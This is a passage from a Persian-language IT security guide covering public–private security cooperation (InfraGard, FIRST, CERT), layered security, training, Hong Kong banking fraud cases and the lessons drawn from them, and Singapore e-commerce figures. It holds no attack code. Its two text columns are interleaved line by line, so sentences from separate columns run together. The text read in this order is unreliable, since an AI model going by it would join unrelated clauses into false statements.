‫ﻗﺎﻧﻮﻧﻲ ﻭ ﺗﻬﺪﻳـﺪﻫﺎﻱ ﻣﻮﺟـﻮﺩ ﺿـﺮﻭﺭﻱ ﺍﺳـﺖ‪ .‬ﺑﻌﻨـﻮﺍﻥ‬ ‫ﺳﻄﻮﺡ ﻣﺨﺘﻠﻒ ﻫﻤﻜـﺎﺭﻱ ﻭﺟـﻮﺩ ﺩﺍﺷـﺘﻪ‪ ،‬ﺍﻣﻨﻴـﺖ ﭘﺮﺩﺍﺧﺘﻬـﺎﻱ‬
‫ﻣﺜﺎﻟﻬــﺎﻳﻲ ﺍﺯ ﻫﻤﻜــﺎﺭﻱ ﻭ ﺷــﺮﺍﻛﺖ ﻋﻤﻠﻴــﺎﺗﻲ ﺑﺨــﺶ‬ ‫ﻼ ﺑـﻪ ﺗـﺪﺍﺧﻞ ﺑﺨـﺸﻬﺎﻱ‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﻣﻮﺍﺭﺩﻱ ﺍﺳﺖ ﻛﻪ ﻛـﺎﻣ ﹰ‬
‫ﺧﺼﻮﺻﻲ ﻭ ﺩﻭﻟﺖ ﻣـﻲﺗـﻮﺍﻥ ﺍﺯ ﻣﺆﺳـﺴﺔ ‪InfraGard‬‬ ‫ﻣﺨﺎﺑﺮﺍﺕ ﻭ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻧﺠﺎﻣﻴﺪﻩ ﺍﺳﺖ‪ .‬ﺻﻨﻌﺖ ﺑﺎﻧﻜﻲ ﺷﺎﺧﺼﻬﺎﻱ‬
‫‪ NIPC‬ﻧﺎﻡ ﺑﺮﺩ‪ ،‬ﻛـﻪ ﻣﺤـﺼﻮﻝ ﻳـﻚ ﻫﻤﻜـﺎﺭﻱ ﻣﻴـﺎﻥ‬ ‫ﺍﻣﻨﻴﺖ ﻭ ﺻﺤﺖ ﺭﺍ ﺗﺤﺖ ﻋﻨﻮﺍﻥ "ﺩﺳﺘﺮﺳﻲ ﺑـﺪﻭﻥ ﺗﺒﻌـﻴﺾ ﺑـﻪ‬
‫ﻲ ﺻﻨﻌﺖ ﻭ ﺩﻭﻟﺖ ﺍﻳﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺑـﻮﺩ ﻭ‬ ‫ﺑﺨﺶ ﺧﺼﻮﺻ ﹺ‬ ‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺳﺎﻟﻢ ﻭ ﺍﻣـﻦ" ﺗﻌﺮﻳـﻒ ﻛـﺮﺩ‪ ،‬ﻭ ﺍﺯ ﻃـﺮﻑ‬
‫ﺗﻮﺳﻂ ‪ FBI‬ﻧﻤﺎﻳﻨﺪﮔﻲ ﻣﻲﺷﺪ‪ .‬ﺷـﻜﻞ ﺩﻳﮕـﺮ ﺍﻳـﻦ ﻧـﻮﻉ‬ ‫ﺩﻳﮕﺮ ﺁﺭﻣﺎﻥ ﺻﻨﻌﺖ ﻣﺨﺎﺑﺮﺍﺕ "ﺩﺳﺘﺮﺳـﻲ ﻫﻤﮕـﺎﻧﻲ ﺑـﺮ ﺍﺳـﺎﺱ‬
‫ﻫﻤﻜﺎﺭﻱ ﺑﺎ ﻧﺎﻡ ‪ ٢٢٨FIRST‬ﻣﻴﺎﻥ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﺗﻴﻤﻬـﺎﻱ‬ ‫ﻋﻼﻗــﻪ ﻭ ﺭﻓــﺎﻩ ﻋﻤــﻮﻣﻲ" ﺑــﻮﺩ‪ .‬ﺍﻳﻨﮕﻮﻧــﻪ ﺗﻌــﺎﺭﻳﻒ ﻣﺘﻔــﺎﻭﺕ ﺍﺯ‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﺔ ﺑﺨـﺶ ﺩﻭﻟﺘـﻲ‪ ،‬ﺍﻗﺘـﺼﺎﺩﻱ ﻭ ﺩﺍﻧـﺸﮕﺎﻫﻲ‬ ‫"ﺧﺪﻣﺎﺕ ﺍﻣﻦ"‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﺍﻳﻤﻦﻛﺮﺩﻥ ﺷﺒﻜﻪﻫﺎ ﻭ ﺩﺭﻧﻈـﺮ‬
‫ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻫﺪﺍﻑ ‪ FIRST‬ﺍﻳﺠﺎﺩ ﻫﻤﺎﻫﻨﮕﻲ ﻭ‬ ‫ﮔﺮﻓﺘﻦ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻗﺘـﺼﺎﺩﻱ ﺑـﺼﻮﺭﺕ ﻫﻤﺰﻣـﺎﻥ‪ ،‬ﺩﭼـﺎﺭ ﻣـﺸﻜﻞ‬
‫ﻫﻤﻜﺎﺭﻱ ﺑﺮﺍﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ‪ ،‬ﻭﺍﻛﻨﺶ ﺳـﺮﻳﻊ‬ ‫ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺑﻪ ﺣﻮﺍﺩﺙ ﺍﻣﻨﻴﺘﻲ ﻭ ﺗـﺮﻭﻳﺞ ﺍﺷـﺘﺮﺍﻙ ﺍﻃﻼﻋـﺎﺕ ﻣﻴـﺎﻥ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﺳﻄﻮﺡ ﻭﺳﻴﻊ ﻋﻨـﻮﺍﻥ ﺷـﺪﻩ ﺍﺳـﺖ‪ .‬ﺍﺯ ﺩﻳﮕـﺮ‬ ‫ﻧﻈﺎﺭﺕ ﻭ ﭘﻴﺸﮕﻴﺮﻱ‬
‫ﻣﺜﺎﻟﻬــﺎ ﺩﺭ ﺍﻳــﻦ ﺯﻣﻴﻨــﻪ ﻣــﻲﺗــﻮﺍﻥ ﺑــﻪ ﭘﻴﻤــﺎﻥ ﺍﻣﻨﻴ ـﺖ‬ ‫ﺑﺎ ﻭﺟﻮﺩ ﻣﺸﻜﻼﺕ ﻓﺮﺍﻭﺍﻥ ﭘـﺮﺩﺍﺧﺘﻦ ﺑـﻪ ﻧﻴﺎﺯﻣﻨـﺪﻳﻬﺎﻱ ﺩﻭﮔﺎﻧـﺔ‬
‫ﺍﻳﻨﺘﺮﻧﺖ‪ ٢٢٩‬ﻭ ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ )‪(CERT‬‬ ‫ﺍﻣﻨﻴﺖ ﻭ ﺻﺤﺖ‪ ،‬ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻳـﻚ ﻧﻴـﺎﺯ ﺣﻴـﺎﺗﻲ ﺑـﺮﺍﻱ‬
‫ﺍﺷﺎﺭﻩ ﻛﺮﺩ‪ ،‬ﻛﻪ ﻣﺤﺼﻮﻝ ﻳﻚ ﻫﻤﻜﺎﺭﻱ ﻣـﺸﺘﺮﻙ ﻣﻴـﺎﻥ‬ ‫ﺑﻴﺸﺘﺮ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺳﺖ ﻭ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ ﻋﻤﻠـﻲ‪،‬‬
‫ﻲ ‪ CERT‬ﺩﺭ ﺩﺍﻧـﺸﮕﺎﻩ ‪Carnegie‬‬ ‫ﻣﺮﻛﺰ ﺑـﻴﻦﺍﻟﻤﻠﻠـ ﹺ‬ ‫ﻗــﺎﻧﻮﻧﻲ ﻭ ﺣﻴﺜﻴﺘــﻲ ﺩﺭ ﻣﺤــﻴﻂ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ‪ ،‬ﺗــﻼﺵ ﻭ‬
‫‪ Mellon‬ﻭ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﻏﻴﺮﺩﻭﻟﺘـﻲ‬ ‫ﻫﻤﺎﻫﻨﮕﻲ ﺯﻳﺎﺩﻱ ﺻﻮﺭﺕ ﭘﺬﻳﺮﺩ‪ .‬ﻃﺮﺣﻬﺎﻳﻲ ﻛﻪ ﺑـﺮﺍﻱ ﺍﻓـﺰﺍﻳﺶ‬
‫ﺍﺳﺖ‪.‬‬ ‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺑﺎﻳﺪ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﻧﺪ‪:‬‬
‫ﺍﻣﻨﻴــﺖ ﭼﻨﺪﻻﻳــﻪ‪ .‬ﻣﻬﻤﺘــﺮﻳﻦ ﺭﺍﻫﻜــﺎﺭ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ‬ ‫•‬
‫ﺁﻣﻮﺯﺵ‪ ،‬ﺁﮔـﺎﻫﻲ ﻭ ﻳـﺎﺩﮔﻴﺮﻱ ﻣﻬـﺎﺭﺕ‪ .‬ﺗﺤﻘﻴـﻖ ﺑﺎﻧـﻚ‬ ‫•‬
‫ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺷﻴﻮﺓ ﭼﻨﺪﻻﻳﻪ ﺍﺳﺖ ﻛـﻪ ﺩﺭ ﺁﻥ ﺍﻳﻤﻨـﻲ ﺗﻨﻬـﺎ‬ ‫ﺟﻬﺎﻧﻲ ﻧﺸﺎﻥ ﻣﻲ ﺩﻫﺪ ﻛﻪ ﺣﺪﻭﺩ ‪ %۵۰‬ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺗﻮﺳﻂ ﻓﻨﺎﻭﺭﻱ ﺗﺄﻣﻴﻦ ﻧﻤﻲﺷﻮﺩ‪ ،‬ﺑﻠﻜﻪ ﺍﻓـﺮﺍﺩ ﻭ ﻓﺮﺁﻳﻨـﺪﻫﺎ‬ ‫ﻧﺎﺷﻲ ﺍﺯ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺍﮔﺮ ﺍﺟﺮﺍﻱ ﻧﺎﺩﺭﺳـﺖ‬
‫ﻧﻴﺰ ﺩﺭ ﺁﻥ ﻧﻘﺶ ﻋﻤﺪﻩﺍﻱ ﺩﺍﺭﻧﺪ‪ .‬ﺍﻋﺘﻤﺎﺩ ﺑﻴﺶ ﺍﺯ ﺣـﺪ ﺑـﻪ‬ ‫ﻲ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﻧﻴـﺰ‬
‫ﻳﺎ ﻧﺎﺗﻮﺍﻧﻲ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘ ﹺ‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﺭﺯﺷﻤﻨﺪﻱ ﭼﻮﻥ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻟﺰﻭﻣﹰﺎ ﺳﺎﺯﻣﺎﻥ ﺭﺍ‬ ‫ﺑﻪ ﺍﻳﻦ ﺁﻣﺎﺭ ﺑﻴﺎﻓﺰﺍﻳﻴﻢ‪ ،‬ﺍﻳﻦ ﺩﺭﺻﺪ ﺑﺎﺯ ﻫﻢ ﺍﻓﺰﺍﻳﺶ ﺧﻮﺍﻫﺪ‬
‫ﻳﺎﻓﺖ‪.‬‬
‫‪228 Forum of Incident Response and Security‬‬
‫‪Teams‬‬
‫)‪229 Internet Security Alliance (www.isalliance.org‬‬
‫‪٢١٧‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﻫﻮﺷﻤﻨﺪ(‪ .‬ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﻳـﻦ ﻣﻨﻈـﻮﺭ ﺍﺯ ﻫـﺮ ﺭﻣـﺰ‬ ‫ﺩﺭ ﻣﻘﺎﺑﻞ ﻫﻤﺔ ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﻤﻜـﻦ ﺣﻔﺎﻇـﺖ ﻧﻤـﻲﻛﻨـﺪ‪.‬‬
‫ﻋﺒﻮﺭ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﻳﻜﺒﺎﺭ ﻣﻲﺗﻮﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬ ‫ﺩﻭﺍﺯﺩﻩ ﻻﻳﺔ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻳﻜﭙﺎﺭﭼﮕﻲ ﺍﻃﻼﻋﺎﺕ ﻭ‬
‫ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺤﻴﻄﻬﺎﻱ ﺑـﺎ ﻣﻌﻤـﺎﺭﻱ ﺑـﺎﺯ ﺗﻌﺮﻳـﻒ‬
‫ﺁﮔﺎﻫﻲ ﻣﺸﺘﺮﻱ )ﺿﻌﻴﻔﺘﺮﻳﻦ ﺣﻠﻘﺔ ﺯﻧﺠﻴﺮ ﺍﻣﻨﻴﺘـﻲ( ﺭﺍ ﺍﻓـﺰﺍﻳﺶ‬ ‫‪.۴‬‬
‫ﺷﺪﻩ ﻭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ‪ ،‬ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭﺍﻗﻌﻲ ﻫﺮ ﻻﻳﻪ‪،‬‬
‫ﺩﻫﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨـﺪ ﺍﺯ ﺭﻭﺷـﻬﺎ ﻭ ﻛﺎﻧﺎﻟﻬـﺎﻱ ﻣﺨﺘﻠـﻒ ﺑـﺮﺍﻱ‬
‫ﻧﻴﺎﺯ ﺑﻪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻫﻨﮕﻔﺘﻲ ﻧﺪﺍﺭﺩ‪ .‬ﺍﻳـﻦ ﺩﻭﺍﺯﺩﻩ ﻻﻳـﻪ‬
‫ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ‪ .‬ﺍﺭﺗﺒﺎﻃـﺎﺕ‬
‫ﺩﺭ ﻓﺼﻞ ﻳﺎﺯﺩﻫﻢ ﺍﺯ ﻫﻤﻴﻦ ﺑﺨـﺶ ﻛﺘـﺎﺏ ﺗﻮﺿـﻴﺢ ﺩﺍﺩﻩ‬
‫ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﻣﻦ ﺑﺎﺷﻨﺪ‪ ،‬ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﺷﺎﻣﻞ ﻧﺼﺐ ﺩﻳﻮﺍﺭﻩﻫـﺎﻱ‬
‫ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺁﺗﺶ ﺷﺨﺼﻲ‪ ٢٣٠‬ﻭ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ‬
‫ﻧﻴﺰ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﻧﻘﺶ ﻛﺸﻮﺭﻫﺎ‬
‫ﺭﻭﻳﺪﺍﺩﻫﺎ ﺑﺎﻳﺪ ﻣﺪﻳﺮﻳﺖ ﺷﺪﻩ ﻭ ﺑﺴﺮﻋﺖ ﮔﺰﺍﺭﺵ ﺷﻮﻧﺪ ﺗـﺎ‬ ‫‪.۵‬‬
‫ﻧﺴﺒﺖ ﺑﻪ ﻭﺍﻛﻨﺶ ﻣﻮﻓﻘﻴـﺖﺁﻣﻴـﺰ ﺗـﻴﻢ ﺍﻣﻨﻴـﺖ ﺍﻃﻤﻴﻨـﺎﻥ‬ ‫ﻫﻨﮓﻛﻨﮓ‬
‫ﺣﺎﺻﻞ ﺷﻮﺩ‪.‬‬
‫ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﺍﺩﺍﺭﺓ ﻣﻤﻴﺰﻱ ﻣﺎﻟﻲ ﻫﻨﮓﻛﻨﮓ ﺑـﺎ ﻣـﺮﻭﺭﻱ ﺑـﺮ ﺳـﻪ‬
‫ﺩﺭ ﻫﻨﮓﻛﻨﮓ‪ ،‬ﺩﻭﻟﺖ ﺑﺎ ﺑﺎﻧﻜﻬﺎ ﻭ ﭘﻠﻴﺲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺭﻭﻳـﺪﺍﺩﻫﺎ‬ ‫ﻣﻮﺭﺩ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺑﺤﺚ ﺧﻮﺩ ﺭﺍ ﺁﻏﺎﺯ ﻛﺮﺩﻧﺪ‪:‬‬
‫ﻭ ﺧﻄﺮﺍﺕ ﻫﻤﻜﺎﺭﻱ ﻣﻲ ﻛﻨﺪ ﻭ ﺑـﺎ ﺍﻋﻤـﺎﻝ ﻣـﺪﻳﺮﻳﺖ ﺍﺛـﺮﺑﺨﺶ‪،‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻧﻔﻮﺫﮔﺮﻱ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺗﺮﺍﻭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺗﻌﺪﺍﺩﻱ ﺭﻣﺰ‬ ‫‪.۱‬‬


‫ﭘﺎﺳــﺨﮕﻮﻳﻲ ﺭﺍ ﺗــﻀﻤﻴﻦ‪ ،‬ﺭﻭﻳــﺪﺍﺩﻫﺎ ﺭﺍ ﮔــﺰﺍﺭﺵ‪ ،‬ﺧــﺴﺎﺭﺗﻬﺎ ﺭﺍ‬
‫ﻋﺒﻮﺭ ﻭ ﺷﻨﺎﺳﻪ ﺍﻗﺪﺍﻡ ﻛـﺮﺩ ﻭ ﺗﻮﺍﻧـﺴﺖ ﺑـﻴﺶ ﺍﺯ ‪۳۵,۰۰۰‬‬
‫ﻛﻨﺘﺮﻝ‪ ،‬ﻭ ﺍﻋﺘﻤﺎﺩ ﻋﻤﻮﻣﻲ ﺭﺍ ﺟﻠﺐ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺑـﻪ ﺍﻳـﻦ‬
‫ﺩﻻﺭ ﺁﻣﺮﻳﻜﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﻏﻴﺮﻣﺠﺎﺯ ﺟﺎﺑﺠﺎ ﻛﻨﺪ‪.‬‬
‫ﻧﻜﺘﻪ ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﻃﻴـﻒ ﻭﺳـﻴﻊ ﻣـﺸﻜﻼﺕ‬
‫ﺍﻣﻨﻴﺘﻲ ‪ISP‬ﻫﺎ‪ ،‬ﺗﻨﻮﻉ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﻮﺟـﻮﺩ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ‬ ‫ﻳﻚ ﻣﻮﺭﺩ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺑﺪﻟﻴﻞ ﺿﻌﻒ ﺁﮔﺎﻫﻲ ﻣﺸﺘﺮﻱ ﺩﺭ‬ ‫‪.۲‬‬
‫ﻧﺤــﻮﺓ ﻛﻨﺘــﺮﻝ‪ ،‬ﺍﻳﻤــﻦﺳــﺎﺯﻱ‪ ،‬ﻭ ﺁﮔــﺎﻩﻛــﺮﺩﻥ ﻋﻤــﻮﻡ ﺩﺭ ﻣــﻮﺭﺩ‬ ‫ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺭ ﺳﻴﺴﺘﻢ ﭘﺮﺩﺍﺧﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺷﻮﺍﺭ ﮔﺮﺩﺩ‪.‬‬ ‫ﺩﺭ ﺍﺳﺘﺮﺍﻟﻴﺎ ﺭﻭﻱ ﺩﺍﺩ‪ .‬ﺑﺪﻟﻴﻞ ﺍﻋﻤﺎﻝ ﻧﺸﺪﻥ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ‬
‫ﻻﺯﻡ‪ ،‬ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻮﺍﻧﺴﺘﻨﺪ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﺪﻩ ﻭ ﺣﺪﻭﺩ ﺳﻪ‬
‫ﺳﻨﮕﺎﭘﻮﺭ‬ ‫ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺳﺮﻗﺖ ﻛﻨﻨﺪ‪.‬‬
‫ﺑﺤﺚ ﻛﺸﻮﺭ ﺳﻨﮕﺎﭘﻮﺭ ﺣﻮﻝ ﭼﻬﺎﺭ ﻣﺤﻮﺭ ﺍﺻـﻠﻲ ﺑـﻮﺩ‪ :‬ﺁﻣﺎﺭﻫـﺎ ﻭ‬ ‫ﺩﺭ ﻳﻚ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻮﺍﻧﺴﺘﻨﺪ ﺣﺪﻭﺩ‬ ‫‪.۳‬‬
‫ﻧﻜﺎﺗﻲ ﺩﺭ ﻣـﻮﺭﺩ ﻛـﺸﻮﺭ ﻛـﺮﻩ‪ ،‬ﻭﺿـﻌﻴﺖ ﺍﻗﺘـﺼﺎﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪،‬‬ ‫‪ ۵‬ﻣﻴﻠﻴﻮﻥ ﺳﻬﻢ )ﺑﺎ ﺍﺭﺯﺷﻲ ﺑﺮﺍﺑﺮ ‪ ۲۱،۷‬ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺁﻣﺮﻳﻜـﺎ( ﺭﺍ‬
‫ﺯﻳﺮﺳﺎﺧﺖ ﻣﻠﻲ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ‪ ،‬ﻭ ﻭﺍﻛﻨﺸﻬﺎﻱ ﺩﻭﻟـﺖ ﺩﺭ ﺣـﻮﺍﺩﺙ‬ ‫ﻓﺮﻭﺧﺘﻪ ﻭ ﺩﺭ ﻗﻴﻤﺖ ﺳﻬﺎﻡ ﻧﻮﺳﺎﻥ ﺷﺪﻳﺪﻱ ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪ‪.‬‬
‫ﺍﺧﻴﺮ‪ .‬ﺑﺤﺚ ﺑﺎ ﺍﺭﺍﺋﻪ ﺷﻮﺍﻫﺪﻱ ﺍﺯ ﺭﺷﺪ ﺳﺮﻳﻊ ﻓﻨـﺎﻭﺭﻱ ﺩﺭ ﺧـﻼﻝ‬
‫ﺳﺎﻟﻬﺎﻱ ‪ ۱۹۹۸‬ﺗﺎ ‪ ،۲۰۰۱‬ﺍﺯ ﻣﻮﺭﺩ ﺍﻭﻝ ﺷﺮﻭﻉ ﺷﺪ‪:‬‬ ‫ﺩﺭﺳﻬﺎﻳﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺍﻳﻦ ﺭﻭﻳﺪﺍﺩﻫﺎ ﮔﺮﻓﺖ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬

‫ﺩﺭ ﺳﺎﻝ ‪ ۱۹۹۸‬ﺩﺭﺁﻣﺪﻫﺎﻱ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺣـﺪﻭﺩ‬ ‫•‬ ‫ﺗﻐﻴﻴﺮﺍﺕ ﺣﺴﺎﺑﻬﺎﻱ ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ ﺭﺍ ﺛﺒﺖ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻦ ﺍﻣﺮ‬ ‫‪.۱‬‬
‫‪ ۴۰‬ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺑﻮﺩ ﻭ ﺩﺭ ﺳـﺎﻝ ‪ ۲۰۰۱‬ﺑـﻪ ‪ ۹۱‬ﻣﻴﻠﻴـﻮﻥ‬ ‫ﺑﻪ ﻣﻌﻨﻲ ﻛﻨﺘﺮﻝ ﻛﻠﻴﺔ ﺩﺳﺘﺮﺳﻴﻬﺎ ﻭ ﺍﻧﺘﻘﺎﻟﻬـﺎﻱ ﻏﻴﺮﻣﺠـﺎﺯ‬
‫ﺩﻻﺭ ﺭﺳﻴﺪ‪.‬‬ ‫ﻧﻴﺰ ﻣﻲﺑﺎﺷﺪ‪.‬‬

‫ﺩﺭ ﺳﺎﻝ ‪ ۱۹۹۸‬ﺗﻌﺪﺍﺩ ‪ ۱۴,۰۰۰‬ﺧﺎﻧﻮﺍﺭ ﺑﻪ ﺷﺒﻜﻪﻫـﺎﻱ ﺑـﺎ‬ ‫•‬ ‫ﻣﻌﺎﻣﻼﺕ ﺑﺎﻧﻜﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ‪ ،‬ﻭ ﺩﺭ ﻣـﻮﺭﺩ‬ ‫‪.۲‬‬
‫ﺳﺮﻋﺖ ﺑﺎﻻ ﻣﺘﺼﻞ ﺑﻮﺩﻧﺪ ﻭ ﺍﻳﻦ ﺗﻌﺪﺍﺩ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﺑﻪ‬ ‫ﻣﻌﺎﻣﻼﺕ ﻭ ﺣﺴﺎﺑﻬﺎﻱ ﻣـﺸﻜﻮﻙ ﺑـﺎ ﺻـﺎﺣﺒﺎﻥ ﺣـﺴﺎﺑﻬﺎ‬
‫‪ ۷،۸‬ﻣﻴﻠﻴﻮﻥ ﻣﻌﺎﺩﻝ ‪ %۶۴‬ﺟﻤﻌﻴﺖ ﺭﺳﻴﺪ‪.‬‬ ‫ﻫﻤﺎﻫﻨﮕﻲ ﻣﺠﺪﺩ ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ )ﺍﺯ ﻃﺮﻳﻖ ‪ ،SMS‬ﻳﺎ ﺍﺯ ﻃﺮﻳـﻖ‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ(‪.‬‬
‫ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﺍﻋﺘﺒﺎﺭ ﻣﺸﺘﺮﻱ ﺍﺯ ﻋﻮﺍﻣﻞ ﭼﻨﺪﮔﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ‬ ‫‪.۳‬‬
‫ﻛﻨﻴﺪ )ﺑﺮ ﺍﺳﺎﺱ ﺍﺑﺰﺍﺭﻱ ﻛﻪ ﺗﻨﻬﺎ ﻣـﺸﺘﺮﻱ ﺁﻧـﺮﺍ ﺩﺍﺭﺩ؛ ﻣﺜـﻞ ﻛـﺎﺭﺕ‬

‫‪230 Personal Firewalls‬‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢١٨‬‬

‫ﻧﻜﺮﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑـﺎﻧﻜﻲ ﺑـﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ‬ ‫ﺩﺭ ﺳﺎﻝ ‪ ۱۹۹۸‬ﺗﻨﻬـﺎ ‪ ۳‬ﻣﻴﻠﻴـﻮﻥ ﻛـﺎﺭﺑﺮ ﺍﻳﻨﺘﺮﻧـﺖ ﻭﺟـﻮﺩ‬ ‫•‬
‫ﺁﺳﻴﺐ ﺩﻳﺪﻧﺪ ﻛﻪ ﻭﺻﻠﻪﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺭﻭﻱ ﺁﻧﻬـﺎ ﺍﻋﻤـﺎﻝ‬ ‫ﺩﺍﺷﺖ‪ ،‬ﻛﻪ ﺍﻳﻦ ﺭﻗﻢ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﺑﻪ ‪ ۲۴‬ﻣﻴﻠﻴـﻮﻥ ﻧﻔـﺮ‬
